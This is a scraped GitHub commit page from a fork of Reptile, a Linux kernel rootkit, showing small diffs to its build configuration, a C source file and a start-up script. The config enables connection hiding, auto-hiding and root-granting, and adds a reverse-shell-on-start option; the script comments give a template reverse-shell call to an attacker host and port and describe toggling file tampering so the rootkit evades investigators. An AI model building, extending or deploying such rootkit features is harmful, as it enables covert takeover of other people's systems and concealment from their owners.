forked from f0rb1dd3n/Reptile
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
9 changed files
with
61 additions
and
14 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -42,3 +42,4 @@ HIDE="reptile" | |
CONFIG_HIDE_CONN=y | ||
CONFIG_AUTO_HIDE=y | ||
CONFIG_GIVE_ROOT=y | ||
# CONFIG_RSHELL_ON_START is not set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -3,8 +3,6 @@ | |
|
||
#include "file.h" | ||
|
||
int file_tampering_flag = 1; | ||
|
||
int file_check(void *arg, ssize_t size) | ||
{ | ||
int ret = 0; | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,6 +1,22 @@ | ||
#!/bin/bash | ||
#<XXXXX> | ||
# | ||
# | ||
# YOU SHOULD PUT YOUR CUSTOM START ROUTINE HERE | ||
# | ||
#SHELL -t LHOST -p LPORT -s PASS -r INTERVAL | ||
# | ||
# This script should be executed after all hooks | ||
# raise up, to enable us use reptile features on | ||
# its start up. Then the file-tampering feature | ||
# starts disabled to enable load this script | ||
# properly. So, after all, we should enable | ||
# file-tampering again | ||
# | ||
#CMD file-tampering | ||
# | ||
# Actually, there is no need to hide file content | ||
# of this script, because if someone tries to | ||
# investigate this, it means Reptile was get caught. | ||
# But I am going to let this script as it is now ;) | ||
# | ||
#</XXXXX> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters